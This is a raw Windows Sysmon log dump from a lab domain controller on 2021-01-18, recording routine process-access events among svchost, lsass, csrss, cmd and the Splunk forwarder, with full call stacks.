13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.877{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.861{59A5CD1D-8E44-6005-0B00-00000000A301}8563592C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+710ae|C:\Windows\system32\lsass.exe+3907|C:\Windows\SYSTEM32\ntdll.dll+803e4|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.767{59A5CD1D-8E57-6005-3800-00000000A301}35283548C:\Windows\system32\conhost.exe{59A5CD1D-8E57-6005-3700-00000000A301}3520C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.752{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}3528C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.752{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}3520C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.752{59A5CD1D-8E56-6005-3000-00000000A301}25322572C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{00000000-0000-0000-0000-000000000000}3520C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2b15|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.753{59A5CD1D-8E57-6005-3700-00000000A301}3520C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
10341000x80000000000000001473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 